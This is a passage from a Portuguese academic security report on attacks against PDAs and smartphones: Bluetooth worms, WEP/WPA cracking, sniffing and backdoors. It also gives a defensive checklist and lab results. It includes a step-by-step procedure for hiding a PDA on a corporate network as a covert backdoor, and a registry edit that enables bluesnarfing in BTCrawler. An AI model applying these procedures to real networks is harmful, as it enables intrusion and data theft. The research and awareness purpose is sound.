    sendo relativamente inofensivo, ele representa uma nova era para criadores de vrus e um novo

    conjunto de preocupaes para os proprietrios de telefones mveis.

    Um vrus pode ser escrito, infectar um nico dispositivo e provavelmente ter vida curta.

    Para manter o vrus vivo, ele deve ser capaz de se propagar de um dispositivo para outro. Isso

    chamado de infector ou vetor de infecco. Enquanto vetores de infeco tm mudado e

    evoludo ao longo dos anos, o mais comum via e-mail. Uma vez um dispositivo infectado, o vrus

    usa seu prprio mecanismo de envio de e-mails ou o cliente de e-mail da vtima para se

    disseminar para os e-mails que encontra no sistema. Outros vetores de infeco so drives de

    disquete e software pirata. Novos vetores so raros simplesmente porque h um nmero limitado

    de novos mtodos de comunicao.

    Apesar do conceito de descobrimento de dispositivos via Bluetooth ser excelente, nos

    ltimos anos diversas vulnerabilidades tm sido encontradas no protocolo que torna possvel a

    obteno de informaes de usurios, envio de mensagens no solicitadas e realizao de outros

    ataques. Entretanto, at agora esses ataques tm sido feitos somente em laboratrio ou para

    mandar mensagens no solicitadas a outros dispositivos Bluetooth.

    Embora o worm Caribe em si seja inofensivo, recentemente tem sido misturado a outros

    malwares, criando novas ameaas. Uma vez o dispositivo infectado, ele varre outros dispositivos

    Bluetooth at encontrar um (e somente um). Depois, tenta enviar para o alvo uma cpia de si.

    Neste ponto, a vtima instigada com uma caixa de dilogo, que pergunta se a pessoa gostaria de

    aceitar o arquivo que chega. Se a vtima aceitar, o arquivo se transferir e outro prompt

    aparecer alertando que a origem do arquivo no pde ser verificada. Se a vtima escolher a

    opo Continuar, o dispositivo ir perguntar vtima pela ltima vez se deseja mesmo instalar

    o programa. Neste ponto, o dispositivo j est infectado.

    Uma vez infectado, uma tela aparece no dispositivo da vtima com a mensagem Caribe-

    VZ/29a. Ento, o dispositivo infectado comea a varrer outros que possam ser infectados.

    O Caribe transferir o arquivo uma nica vez. Alm do mais, somente telefones Nokia [27]

    da srie 60 mostram-se vulnerveis, pelo menos de acordo com um memorando interno escrito

    pela Symbian. Ainda, esse worm requer interao de um usurio sem conhecimento algum, pois

    trs alertas so emitidos, dificultando a disseminao do Caribe. Quer dizer, at que ele seja

    misturado a outro malware. Apesar deste worm no se aplicar ao escopo de sistemas

    operacionais deste trabalho, interessante citar o caso do Caribe por ser o pioneiro a se espalhar

    via Bluetooth.

  • 34

    3.3. Ataques via interface IEEE 802.11 Ataques a PDAs em redes sem fio no so um problema especfico dos PDAs. No entato,

    considerando que a maioria dos usurios de PDAs possuem uma conexo Wi-Fi para ler/responder

    e-mails, conectar-se ao escritrio ou acessar a Internet, devemos considerar este vetor de

    ataque.

    Resumidamente, podemos dizer que o usurio do PDA poder ser atacado das seguintes

    formas: quebra da chave criptogrfica WEP (Wired Equivalent Privacy), quebra da chave

    criptogrfica WPA (Wi-Fi Protected Access), ataques Man in The Middle (MiTM), injeo de

    contedo Web, ataques passivos (coleta de trfego), pontos de acesso maliciosos (rogue acess

    points), ataques de negao de servio e estouro de pilha (buffer overflow).

    Atravs destes, um atacante pode interceptar mensagens de correio eletrnico, obter

    acesso rede interna de empresas, capturar senhas, enganar usurios induzindo-os a acessar

    pginas com cdigo malicioso, dentre outros.

    3.3.1. Ataques ao WEP

    Diversas falhas no algoritmo WEP foram encontradas, que seriamente colocam em dvida

    a sua confiabilidade. Em particular, as ameaas mais conhecidas so:

    Ataques passivos para decriptar trfego baseado em anlise estatstica.

    Ataques ativos para injeo de trfego a partir de estaes no autorizadas.

    Ataques ativos para decriptar trfego, baseados na manipulao de pontos de acesso.

    Ataques baseados na criao de dicionrios construdos a partir de trfego coletado, que

    permite a decriptao automtica de trfego em tempo real.

    Todos os ataques citados podem ser realizados com equipamentos de baixo custo e de

    fcil aquisio. Alm disso, se aplicam tanto ao WEP de 40 quanto ao de 128 bits e ao padro

    802.11b, uma extenso para suportar maiores taxas de transmisso, mas que manteve intocada a

    implementao do WEP. Vamos apresentar com mais detalhes somente o primeiro tipo de ataque,

    por ser o mais comum.

  • 35

    Ataque passivo para decriptao de trfego

    Este ataque possvel devido ao seguinte fato: uma pessoa pode capturar todo o trfego

    encriptado da rede sem fio at que uma coliso do vetor IV seja identificada. Ao aplicar a funo

    lgica XOR entre dois pacotes que usam este mesmo vetor de inicializao (IV), o atacante

    automaticamente obtm o resultado do XOR do texto puro das mensagens de cada pacote. O

    resultado obtido pode ser usado para se fazer inferncias sobre o contedo destas. Como o

    trfego IP bastante previsvel e inclui diversas redundncias, estas podem ser usadas para dar

    vrias dicas sobre o contedo das mensagens. Tentativas de adivinhao mais inteligentes so

    usadas posteriormente e algumas vezes conseguem identificar todo o contedo da mensagem.

    No entanto, quando tais adivinhaes estatsticas baseadas em apenas dois pacotes no

    so insuficientes para identificar o contedo da mensagem, possvel trabalhar com outros

    pacotes cujo vetor IV tambm colidiu. Em um tempo relativamente pequeno, possvel cotetar

    trfego encriptado com a mesma chave, fazendo com que a qualidade da anlise estatstica

    cresa rapidamente. Uma vez que seja possvel desencriptar toda a mensagem, todos os outros

    pacotes que usam o mesmo vetor IV podero ser desencriptados automaticamente.

    3.3.2. Ataques ao WPA

    Atualmente, a nica forma de atacar o algoritmo WPA causando uma re-autenticao

    forada de um usurio que esteja utilizando a rede. necessria uma conexo real e pode ser

    necessrio esperar para que a re-autenticao acontea.

    Ataque de re-autentiucao forada

    Neste ataque simples e efetivo, basta forar um usurio ativo a se re-autenticar e

    capturar o trfego da re-conexo e re-autenticao, o que economiza tempo, pois no mais

    necessrio esperar at que ocorra uma re-autenticao espontnea. Aps alguns segundos, a re-

    autenticao j deve estar completa e poder ser feito um ataque de dicionrio contra a chave

    primria de encriptao PMK (primary master key).

    3.3.3. Ataques de invaso de memria (Buffler Overflow attacks)

    O Windows Mobile to vulnervel a ataques de invaso de memria (ou estouro de pilha

    em algumas tradues) quanto a sua famlia de grandes irmos. O prprio servidor de FTP usado

    para os testes dotado de um. O executvel ftpsvr.exe implementa comandos comuns de FTP,

    mas infelizmente no verifica os parmetros passados. Isso significa que um atacante pode

    sobrescrever a pilha de execuo com cdigo assembly e ter este cdigo arbitrrio executado.

  • 36

    Mesmo que alguns detalhes possam variar entre dispositivos e verses de sistema, vamos

    mostrar que possvel fazer um ataque via rede e injetar cdigo que ir causar um hard reset

    no PDA. Felizmente, esse tipo de ataque relativamente limitado em PDAs. Como no existe

    efetivamente uma shell de comando, um ataque para ser completo requer um upload de alguma

    aplicao para que o controle total do sistema seja obtido. J citamos um exemplo de aplicao

    como esta anteriormente: o calavo de tria brador.exe.

    3.3.4. Captura de trfego

    Um sniffer prov a seu utilizador uma viso do trfego passante na rede. Atualmente, a

    maioria das redes cabeadas baseada em switchs, o que dificulta muito este tipo de ataque (mas

    no o torna impossvel). Neste caso, estamos falando de redes onde os PDAs normalmente no

    esto conectados. No caso de uma rede sem fio, esta funciona de forma parecida com um HUB

    (topologia em barra), pois todos escutam o trfego da rede (claro, desde que estejam

    presentes na localidade de sinal). Como a entrada e sada de Pockets PCs, Smartphones e

    derivados nas mos ou bolsas de visitantes em empresas no so muito controladas, torna-se fcil

    capturar trfego wireless para futura anlise.

    Alguns sniffers para Windows Mobile necessitam que o dispositivo esteja conectado a

    alguma rede antes que possa capturar trfego. No entanto, esta dificuldade no existe nos

    sniffers para Linux, podendo facilmente capturar o trfego do canal desejado (Kismet e tcpdump

    so exemplos de tais ferramentas). A figura a seguir mostra a captura de trfego de um usurio

    da rede quando acessava a pgina do Google, utilizando o vxSniffer:

    Figura 10: vxSniffer em ao

  • 37

    importante ressaltar que um Pocket PC, por exemplo, suporta interface Ethernet, alm

    da wireless, o que permite a sua conexo direta a um HUB ou switch e mais uma vez, capturar

    trfego.

    3.3.5. Anlise de vulnerabilidades

    Uma vez dentro da rede, os PDAs podem realizar o mesmo tipo de varredura que um PC.

    Varreduras atravs de requisies ICMP, por servios conhecidos e at mesmo exploits podem ser

    executados a partir de um equipamento como este. Por exemplo, um iPAQ rodando Linux [12]

    pode ser usado para executar a ferramenta mais conhecida de varradura de redes, Nmap. O Linux

    [12] pode ir alm, pois facilita muito a criao de scripts em Perl, que podem ser usados para

    diversos tipos de teste de invaso.

    3.3.6. Abrindo portas para um ataque

    A seguir, discutiremos sobre um mtodo simples de se obter acesso annimo e remoto a

    uma rede wireless, transformando o PDA em uma verdadeira porta dos fundos feita em hardwar.

    O propsito disso apenas mostrar o quanto se pode ir longe ao se atacar redes wireless usando

    PDAs para que a concincia da necessidade de se aumentar o nvel de segurana nas corporaes

    seja levada srio.

    1. Instalar uma distribuio do Linux [12] de acordo com a preferncia

    2. Instalar drivers necessrios para o funcionamento das interfaces wireless e Ethernet

    3. Criar um script de configurao da interface wireless para inicar em modo ad-hoc aps a inicializao do sistema. O uso de criptografia opcional. A interface deve comear a operar em algum canal livre, escolha.

    4. Instalar as aplicaes SSH, Nmap e tcpdump no PDA.

    5. V at o local desejado e conecte a interface ethernet rede, de forma que fique bem escondido.

    6. Ligue o PDA.

    7. A partir de um laptop ou outro PDA, conecte-se ao equipamento via IP pr-estabelecido, usando tnel SSH.

    8. Agora, pode-se usar o tcpdump para capturar trfego da rede, identificando endereamento para ento alterar o correspondente na interface Ethernet

  • 38

    4. Checklist de Segurana para dispositivos mveis em redes sem-fio

    A seguinte tabela fornece uma checklist de segurana para PDAs e Smartphones. Esta

    apresenta boas prticas de uso e recomendaes para se criar e manter um ambiente seguro para

    o uso destes dispositivos. A primeira coluna (Boa Prtica), caso marcada, significa que a

    informao deve ser implementada. A segunda (Deve-se considerar), significa que a

    recomendao deve ser fortemente analisada por trs motivos:

    primeiro, ir aumentar o nvel de segurana do ambiente atravs do oferecimento de um tipo de

    proteo complementar, segundo, a recomendao utiliza a tcnica de segurana em camadas

    (defense-in-depth strategy). Terceiro, trar impactos de performance, operacionais e custo. Em

    resumo, cada organizao deve avaliar o custo benefcio da implementao.

    Checklist Recomendao de segurana Boa

    prtica Deve-se considerar

    1 Desenvolver uma poltica de segurana para a organizao, que direcione o uso de todos os dispositivos de computao mvel.

    2 Assegurar que os usurios da rede so treinados (security awareness) quanto aos riscos de segurana e esto cientes dos inerentes a dispositivos de computao mvel.

    3 Realizar uma avaliao de risco para entender o valor dos bens presentes na organizao que necessitam de proteo.

    4 Conduzir prticas de auditoria espordicas, mas continuamente, para monitorar e possivelmente detectar incidentes de segurana ligados dispositivos de computao mvel.

    5 Assegurar que os limites de acesso fsico por vias externas s dependncias da organizao so suficientes em termos de proteo, para todo o permetro de prdios da organizao.

    6 Fazer uso de controles de acesso fsico nos prdios e outras reas (Como identificao por crachs com fotografias, cartes inteligentes, biometria e outros).

    7 Minimizar o risco de perda ou roubo atravs do uso de fechaduras e cabos de segurana.

    8 Identificar todos os dispositivos mveis com o nome do proprietrio e informaes de contato da organizao.

  • 39

    9 Assegurar que os usurios saibam onde reportar a perda ou roubo do um dispositivo.

    10 Assegurar que os dispositivos so guardados de forma segura quando fora de uso.

    11 Certifica-se de que mdulos adicionais (perifricos, cartes de memria, etc) esto protegidos adequadamente quando fora de uso, como preveno contra roubos.

    12 Habilitar o pedido de senha ao se ligar cade dispositivo de computao mvel.

    13 Criar e manter uma poltica de manuteno de senhas adequada, (troca de senhas periodicamente, normas de formao, etc).

    14 Assegurar que aplicativos de sincronizao com dispositivos mveis instalados nas estaes de trabalho so protegidos por senha.

    15 Armazenar dados necessrios em mdulos apropriados e de forma encriptada.

    16 Visitar freqentemente websites de fabricantes em busca de correes e verses mais recentes dos softwares utilizados.

    17 Instalar correes de software em dispositivos e estaes de trabalho afetadas.

    18

    Review security-related mailing lists for the latest security information and alerts. Acompanhar listas de discusso relacionadas na Internet para obter as ltimas informaes e alertas de segurana.

    19 Assegurar que todos os dispositivos tenham mecanismos de bloqueio automtico aps um perodo de inatividade.

    20 Sincronizar regularmente dispositivos com suas respectivas estaes de trabalho.

    21 Evitar armazenar informaes confidenciais no dispositivo mvel. Se necessrio, deve-se mov-las para um local mais seguro quando possvel.

    22 Desligar em perodos de inatividade, portas de comunicao do dispositivo.

    23 Instalar software de antivrus em todos os dispositivos mveis.

  • 40

    24 Instalar firewalls pessoais em todos os dispositivos mveis.

    25 Assegurar que os PDAs so disponibilizados para os usurios com software/firmware de controle de acesso.

    26 Instalar clientes de VPNs em todos os dispositivos mveis que transmitem dados atravs de redes wireless.

    27 Assegurar que um usurio possa ser autenticado de forma segura local ou remotamente, para acessar os recursos da organizao.

    28 Usar criptografia robusta e utilitrios de proteo de senha para proteger dados sensveis e aplicaes.

    29 Usar solues de segurana adequada ao tamanho da organizao para gerenciar a segurana de dispositivos de forma centralizada.

    30 Assegurar que ferramentas de anlise de segurana so usadas para avaliar dispositivos mveis.

    31 Quando dispositivos no forem mais ser utilizados, todas as configuraes e dados devem ser apagados adequadamente, evitando a possvel exposio de informaes sensveis.

    5. Avaliao Prtica

    5.1. Testes com Emuladores vs Teste com dispositivos fsicos

    5.1.1. Descrio do ambiente de testes com emuladores

    Alm do trabalho terico, foram realizados testes bsicos usando emuladores dos

    seguintes dispositivos mveis/sistema operacional:

    Pocket PC / Windows Mobile 2003 SE

    Pocket PC / Windows Mobile 5.0

    Smart Phone / Windows Mobile 2003 SE

    Smart Phone / Windows Mobile 5.0

  • 41

    Atravs do Device Emulator Manager (gerenciador de imagens), carregamos as imagens

    dos sistemas operacionais dos dispositivos, sendo possvel simular o fato do dispositivo estar ou

    no em sua base (craddle). A documentao do emulador afirma que este suporta os mesmos

    binrios utilizados pelos equipamentos reais, tanto quanto a arquitetura do processador ARM.

    Foi possvel fazer a comunicao do emulador com o Microsoft ActiveSync, software de

    sincronizao de dados entre o PocketPC e o PC.

    Figura 11: Emulao do Windows Mobile 2003 SE em PocketPC

    Figura 12: Emulao do Windows Mobile 2003 SE em SmartPhone

    5.1.2. Descrio do ambiente de testes com dispositivos fsicos

    Os testes prticos com dispositivos fsicos foram realizados no Laboratrio de Colaborao

    Avanada (LAC/Laboratory of Advanced Collaboration) da Pontifcia Universidade Catlica do Rio

    de Janeiro (PUC-RIO). O ambiente foi composto pelos seguintes modelos de PocketPC e mais um

    PC com acesso Internet:

    HP IPaq HX2490b - Microsoft Windows Mobile 5.0 (Windows CE 5.0) Interfaces de rede

    Wi-Fi e Bluetooth

  • 42

    HP IPaq H5450 - Microsoft Windows Mobile 2003 (Windows CE 4.2) - Interfaces de rede Wi-

    Fi e Bluetooth

    5.1.3. Vantagens e desvantagens quanto aos ambientes

    Os testes foram realizados nos dois ambientes citados anteriormente devido presena

    de vantagens e desvantagens oriundas de cada um.

    O ambiente de testes com emuladores nos trouxe a facilidade de trabalhar com

    aplicaes desenvolvidas para os sistemas operacionais Windows Mobile 2003 e 5.0 em

    arquitetura ARM, em nossas prprias mquinas pessoais. Estas aplicaes foram encontradas na

    Internet e pde-se verificar a compatibilidade e reconhecimento pelos mesmos. Alm disso,

    permitiu o manuseio parcial destas aplicaes, sendo possvel descobrir como funcionavam antes

    de test-las em dispositivos fsicos do laboratrio. Os testes com emuladores nos permiram alm

    de tudo, conhecer melhor o prprio sistema operacional estudado, apesar das limitaes de

    performance ocasionadas devido aos recursos da mquina hospedeira.

    Os testes com dispositivos reais foram mais ilustrativos, pois representavam a realidade

    ou algo muito similar ao ambiente utilizado por um atacante. Os testes com dispositivos reais

    possibilitaram as aplicaes a executarem de forma mais performtica do que nos emuladores,

    mas a grande vantagem era a facilidade de uso das interfaces de rede 802.11 e Bluetooth

    nativamente.

    5.2. Discusso sobre metodologia e critrios de avaliao

    As vulnerabilidades testadas sero apresentadas individualmente, com a sua respectiva

    descrio e resultados obtidos na prxima seo. Sero avaliadas aquelas que forem possveis

    dentro do espao de tempo e recusos disponveis para a realizao deste trabalho.

    Procedimento dos testes

    Os procedimentos utilizados podem ser comparados a ataques reais, pois fizeram uso de

    aplicaes conhecidas e utilizadas por atacantes, que podem ser obtidas facilmente na Internet.

    Na verdade, testes em laboratrio podem apresentar poder de explorao ainda maior do que

    ataques reais, pois o ambiente pode ser ajustado, aumentando ou diminuindo a dificuldade para

    se obter sucesso. Um atacante real, muitas vezes, precisa buscar meios alternativos para facilitar

    a sua execuo, atravs de tcnicas como, por exemplo, engenharia social.

  • 43

    Critrios de avaliao

    O critrio de sucesso utilizado nos testes foi a reproduo de experimentos com o uso de

    aplicaes desenvolvidas pela comunidade de segurana mundial. Cada teste foi feito

    individualmente, estipulando um limite de tempo e nmero de tentativas para casos falhos. Estes

    variaram para cada situao at que comprovassem funcionamento ou falha.

    5.3. Testes com emuladores

    Requisitos de sistema operacional para uso dos emuladores:

    Windows Server 2003 com Service Pack 1

    Windows XP

    Teste: Instalao da ferramenta de varredura de redes Wi-fi Mini-Stumbler

    Descrio: Uma das aplicaes mais conhecidas para varredura de redes 802.11 chamada

    NetworkStumbler. Esta capaz de medir o sinal de cada rede detectada, indicar se usa

    criptografia ou no e prover informaes sobre o hardware identificado. No entanto, uma verso

    especfica para PocketPCs foi criada, com o nome Mini-Stumbler.

    Restries para funcionamento: o emulador preferencialmente deve estar configurado para usar

    a interface Wi-Fi do PC onde est sendo executado.

    Resultados: A aplicao foi instalada com sucesso, mas no foi possvel utilizar suas funes

    principais mesmo com PC local possuindo interface de rede sem fio. A aplicao s suporta uma

    quantidade limitada de equipamentos, listados em: http://www.stumbler.net/compat/.

    Teste: Captura de trfego da rede com a ferramenta VxSniffer

    Descrio: O VxSniffer uma aplicao para coleta de trfego de rede, que funciona deixando a

    interface em modo promscuo ou somente observando o trfego originado/destinado interface

    local. Assim, caso a rede no faa uso de criptografia, possvel observar o que os usurios ao

    redor esto acessando em tempo real, coletar credenciais de contas pessoais e outras

    informaes sigilosas. possvel determinar qual a interface de rede do dispositivo que ser

    usada para esta funo.

    Restries para funcionamento: uso do software ActiveSync para sincronizao de arquivos e

    instalao da ferramenta.

  • 44

    Resultados: A aplicao foi instalada com sucesso e foi possvel coletar trfego da interface local

    da mquina hospedeira do emulador. No entanto, como esta est ligada a um switch, somente o

    trfego de broadcast ou local pde ser observado.

    Figura 13: VxSniffer coletou trfego da interface local

    Figura 14: Detalhes de uma requisio do protocolo ARP

    Teste: Uso de ferramenta de anlise forense (dumper) para coleta de todas as informaes do

    dispositivo para posterior anlise.

    Descrio: Foi utilizada a ferramenta PDA Seizure, uma das mais conhecidas para anlise forense

    de dispositivos mveis.

    Restries para funcionamento: A aplicao suporta somente os seguintes modelos da srie

    IPAQ: H 1940, H 3630, H 3670, H 3760, H4155, HX2110, HX4705, RX1955, RX3115, RX3715,

    RZ1715. Mais informaes: http://www.paraben-forensics.com/cell_models.html.

    Resultados: No foi possvel utilizar esta ferramenta com o emulador, pois esta s compatvel

    com uma verso do ActiveSync inferior nica verso compatvel com o emulador.

  • 45

    5.4. Testes locais Teste: Execuo de aplicaes por Auto-run Descrio: Um arquivo chamado autorun.exe em uma pasta chamada 2577 na raiz de um

    carto de memria (considerando que o dispositivo trabalha com processador ARM) copiado

    para a pasta local do Windows Mbile e executado automaticamente caso detectado. Se o arquivo

    for algum tipo de cdigo malicioso, executado sem a interveno do usurio. Para realizar este

    teste, foi usado um carto de memria do tipo SD (Secure Digital Card), utilizando binrios

    obtidos atravs de fontes na Internet, especficos para executarem um soft reset no dispositivo,

    ou seja, reinici-lo independente do estado em que esteja operando.

    Restries para funcionamento: necessidade de um carto de memria e manuseio direto do

    equipamento.

    Resultados: Foi comprovado que o sistema de auto-run funciona nas condies descritas a cima.

    Foi observado instanteneamente o reiniciar do sistema assim que o SD Card foi inserido.

    Teste: Infeco com porta dos fundos (backdoor)

    Descrio: Teste de manipulao de binrios existentes, transformando-os em uma porta dos

    fundos. Foram realizados testes com um servidor FTP e um servidor de terminal remoto.

    Restries para funcionamento: para ser acessado, o dispositivo deve estar acessvel via rede.

    Em nossos testes, o acessamos atravs da Internet pois existia um endereo IP pblico associado

    ao IP interno do dispositivo atravs de NAT (network address translation).

    Resultados: O servidor de FTP pde ser instalado e testado (acessamos o PocketPC atravs da

    Internet), mas apesar de utilizarmos a ferramenta indicada para edio do binrio, no foi

    possvel excluir a rotina de exibio do cone da aplicao (nico identificador de sua presena no

    sistema). Quanto aplicao de terminal remoto, foi possvel test-la com sucesso, acessar o

    dispositivo atravs da Internet mas, da mesma forma, no editamos o binrio para torn-lo

    invisvel para o usurio. A seguir, as telas obtidas:

  • 46

    Figura 15: Acesso via FTP atravs da Internet ao PocketPC e exibio dos arquivos locais.

    Figura 16: Autenticao com senha para acesso remoto (Atravs da aplicao

    VirtualCE)

    Figura 17: Controle remoto do PocketPC via Internet

  • 47

    Figura 18: Controle remoto do PocketPC via Internet

    Figura 19: Controle remoto do PocketPC via Internet

    Teste: Uso de ferramenta de anlise forense (dumper) para coleta de todas as informaes do

    dispositivo para posterior anlise.

    Descrio: Foi utilizada a ferramenta PDA Seizure, uma das mais conhecidas para anlise

    forense de dispositivos mveis.

    Restries para funcionamento: A aplicao suporta somente os seguintes modelos da srie

    IPAQ: H 1940, H 3630, H 3670, H 3760, H4155, HX2110, HX4705, RX1955, RX3115, RX3715,

    RZ1715. Mais informaes: http://www.paraben-forensics.com/cell_models.html.

    Resultados: A verso do ActiveSync exigida pela aplicao a 3.7.0 ou 3.7.1. Removemos a

    verso 4.0 e tentamos instalar uma das verses requisitadas, mas no obtivemos sucesso devido

    incompatibilidades com o Windows XP. A aplicao pde ser iniciada, mas ao tentar-se adquirir a

    imagem do PDA, a comunicao no foi estabelecida com sucesso. Abaixo, apresentamos uma

    tela que mostra as informaes que poderiam ter sido obtidas:

  • 48

    5.5. Testes com Bluetooth Teste: Roubo de informaes (agenda telefnica, calendrio, fotos, etc - Bluesnarfing) e envio

    de mensagens inoportunas (Bluejacking).

    Descrio: As tcnicas de Bluesnarfing e Bluejacking foram implementadas na aplicao

    BTCrawler, suportada pelo Windows Mobile 2003/5.0.

    Restries para funcionamento: nem todos os dispositivos com suporte a Bluetooth so

    vulnerveis a estes ataques. Segundo o desenvolvedor da aplicao, os seguintes so:

    Nokia 6310, 6310i (at a verso de firmware 5.51), Nokia 8910, 8910i, SE T610 FW:R1A081, SE

    T630 FW:R4C003, SE T68i FW:R2B025, SE Z600 FW:R2E004, SE Z1010.

    Resultados: Foi possvel instalar a aplicao, mas apesar da comunicao via Bluetooth dos

    dispositivos estar operando normalmente, a aplicao foi incapaz de detectar telefones celulares

    com Bluetooth habilitados ou outros PocketPCs. A seguir, mostramos as telas de configurao do

    dispositivo para que ficasse no modo visvel e da aplicao btCrawler, a mais indicada para este

    tipo de teste.

    Obs.: A funo de Bluesnarfing da aplicao precisou ser habilitada atravs da edio do registro

    do PocketPC (feita com uso de aplicao terceira).

    Figura 20: Editando o registro do Windows Mobile atravs da aplicao Mobile Registry Editor

  • 49

    Figura 21: Habilitando a interface Bluetooth do dispositivo

    Figura 22: Configurando a interface Bluetooth do dispositivo para estar visvel

    Figura 23: Aplicao btCrawler com funo de bluesnarfing habilitada via edio de

    registro.

    Procedimento para habilitar a funo de

    bluesnarfing:

    1. Criar a seguinte chave de registro:

    \HKCU\Software\Microsoft\Bluetooth\Mode

    2. Criar a seguinte DWORD:

    Nome: ISC

    Valor: 1

  • 50

    5.6. Testes com IEEE 802.11 Teste: Instalao da ferramenta de varredura de redes Wi-fi Mini-Stumbler

    Descrio: Uma das aplicaes mais conhecidas para varredura de redes 802.11 chamada

    NetworkStumbler. Esta capaz de medir o sinal de cada rede detectada, indicar se usa

    criptografia ou no e prover informaes sobre o hardware identificado. No entanto, uma verso

    especfica para PocketPCs foi criada, com o nome Mini-Stumbler.

    Restries para funcionamento: a interface de rede sem fio deve ser identificada pelo

    dispositivo.

    Resultados: A aplicao foi instalada com sucesso, mas no foi possvel utilizar suas funes pois

    a interface Wi-Fi dos dispositivos disponveis para teste no foram identificadas pela aplicao.

    Figura 24: Mini-stumbler no reconheceu a interface de rede sem fio.

  • 51

    Teste: Captura de trfego da rede com a ferramenta VxSniffer

    Descrio: O VxSniffer uma aplicao para coleta de trfego de rede, que funciona deixando a

    interface em modo promscuo ou somente observando o trfego originado/destinado interface

    local. Assim, caso a rede no faa uso de criptografia, possvel observar o que os usurios ao

    redor esto acessando em tempo real, coletar credenciais de contas pessoais e outras

    informaes sigilosas. possvel determinar qual a interface de rede do dispositivo que ser

    usada para esta funo.

    Restries para funcionamento: para coletar trfego de outras estaes, a interface de rede

    deve suportar o modo promscuo.

    Resultados: A aplicao foi instalada com sucesso, mas s foi possvel varrer o trfego de rede

    originado ou destinado ao dispositivo mvel, pois sua interface Wi-fi no permite ser configurada

    para modo promscuo. A seguir, apresentamos as telas capturadas com detalhes do trfego:

    Figura 25: Captura de trfego da rede 802.11 do LAC

    Figura 26: Detalhes do segmento TCP capturado

  • 52

    Figura 27: Anlise do contedo capturado. Pode-se visualizar o contedo das

    requisies.

    Figura 28: Exibio dos pacotes capturados.

    Teste: Quebra da chave criptogrfica WEP (Wired Equivalent Privacy).

    Descrio: Existem diversas implementaes para atacar o algoritmo criptogrfico WEP, tanto em

    suas verses de chave de 40 ou 104 bits. No entanto, a nica disponvel para Windows Mobile foi

    criada pela empresa E-Eye Security, sendo chamada de Retina Wifi Scanner.

    Restries para funcionamento: apesar do manual afirmar que a ferramenta funciona em

    PocketPCs, no tivemos sucesso ao utiliz-la pois o sistema exibiu um erro afirmando que no

    suporta a aplicao.

    Resultados: Infelizmente a aplicao no foi reconhecida como vlida quando executada no

    PocketPC. Fizemos os testes em Windows XP, sendo capazes de identificar redes 802.11, medindo

    seu sinal e identificando caractersiticas dos Access Points, mas no foi possvel quebrar a chave

    WEP. A "resposta" da chave foi inserida ao dicionrio de ataque, mas a aplicao retornou erros

    afirmando que no conseguiu iniciar o ataque. Tivemos uma sria impresso de que esta

    aplicao de carter experimental e no possuir todos os recursos funcionando corretamente.

    Um indcio disso a sua gratuidade.

  • 53

    Figura 29: Ferramenta E-eye WiFi Scanner identificou uma rede 802.11 com WEP habilitado

    6. Concluso

    Este trabalho ilustrou ameaas de segurana a dispositivos de computao mvel,

    abrangendo os principais sistemas operacionais e tecnologias de rede sem fio do mercado.

    Percebe-se que ainda no h uma conscincia dos perigos existentes por quase a totalidade dos

    usurios destes dispositivos. Muitos deles so executivos e apesar de carregarem consigo

    informaes sigilosas, que nunca deveriam cair em mos erradas, no se preocupam com este

    tipo de problema.

    Existe uma tendncia natural para a evoluo das ameaas que cincurdam dispositivos

    mveis, medida que seu uso se torne mais popular. Algumas empresas j esto se preparando e

    desenvolvendo softwares para aumentar o nvel de segurana de PDAs, como por exemplo

  • 54

    sistemas de criptografia de dados e firewalls pessoais. O poder de disseminao das ameaas se

    tornar cada vez maior, causando grandes prejuzos aos no preparados.

    Cabe aos desenvolvedores de software, buscarem melhorar a qualidade de seus produtos

    para que menos falhas de segurana ocorram, e tambm aos usurios de PDAs a reclamarem

    quando esto insatisfeitos com a qualidade de determinada soluo. A indstria de tecnologia

    est sempre sob presso, e s abre espao para aspectos que no so vistos como lucrativos

    quando o mercado exige.

    No entanto, existe um movimento presente buscando aumentar a conscincia quanto

    ameaas de segurana de modo geral e evitar que acontea novamente nos PDAs o que acontece

    com estaoes de trabalho e mquinas pessoais, infectadas com virus e worms, que j causaram

    prejuzos enormes a diversas instituies.

    Os testes realizados neste estudo apresentaram vulnerabilidades de grande impacto, mas

    que atualmente j podem ser remediadas com mecanismos substitutos. Por exemplo, a quebra de

    chaves WEP estimulou fortemente o estudo de novas solues de criptografia, dando origem ao

    WPA, considerado seguro atualmente.

    Tcnicas como BlueSnarfing, que d margem captura de informaes sigilosas via

    bluetooth, no afetam dispositivos recm-fabricados, pois j receberam correes de segurana

    para remediar esta vulnerabilidade. No entanto, j se pode notar a tendncia de que usurios de

    dispositivos mveis estejam cada vez mais conectados Internet, que dependam cada vez mais

    destes recursos e que cdigos maliciosos sero criados para explorar este fato. A explorao

    poder se dar de inmeros maneiras, por exemplo, capturando senhas de banco e credenciais de

    aplicaes (como correio eletrnico), e algumas ainda mais preocupantes, como a identificao

    da localizao fsica da vtima e contaminao dos dispositivos por mecanismos de espionagem.

    Infelizmente, os dispositivos mveis mais comuns de mercado ainda so muito

    heterogneos em termos de configurao de hardware, drivers especficos e pode-se dizer que

    at mesmo em termos de sistemas operacionais. Este fato foi de certa forma uma barreira para

    nossos testes, pois muitas das aplicaes disponveis hoje para provas de conceito suportam

    apenas alguns dispositivos, com interfaces de rede especficas, o que nos impediu de verificar o

    funcionamento de muitas destas.

    Pode-se dizer que o nmero de ameaas de segurana a dispositivos de computao

    mvel existentes atualmente proporcional quantidade de usurios e maturidade dos

    mecanismos de proteo. Isso significa que muito ainda ir evoluir neste cenrio, e portanto,

    deve-se estar preparado para o aparecimento de ameaas inovadoras, com grande poder de

    destruio e roubo de informaes em massa.

  • 55

    7. Referncias Bibliogrficas

    [1] BLUEJACKQ - URL: www.bluejackq.com

    [2] WIKIPEDIA BLUEJACKING (ROUBO DE DADOS)

    URL: http://pt.wikipedia.org/wiki/Bluetooth#Bluejacking_.28Roubo_de_dados.29

    [3] WIKIPEDIA WEP - URL: http://pt.wikipedia.org/wiki/WEP

    [4] WIKIPEDIA WPA - URL: http://pt.wikipedia.org/wiki/WPA

    [5] WIKIPEDIA IEEE 802.11 URL: http://pt.wikipedia.org/wiki/ieee_802.11

    [6] NIKITA BORISOV, IAN GOLDBERG, E DAVID WAGNER; SECURITY OF THE WEP ALGORITHM

    URL: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html

    [7] SETH FOGIE, INSECURE MAGAZINE, EDIO 1.3, PDA ATTACKS: PALM SIZED DEVICES - PC

    SIZED THREATS URL: www.insecuremag.com.

    [8] CYRUS PEIKARI, INSECURE MAGAZINE, EDIO 1.4, PDA ATTACKS, PART 2: AIRBORNE

    VIRUSES - EVOLUTION OF THE LATEST THREATS.
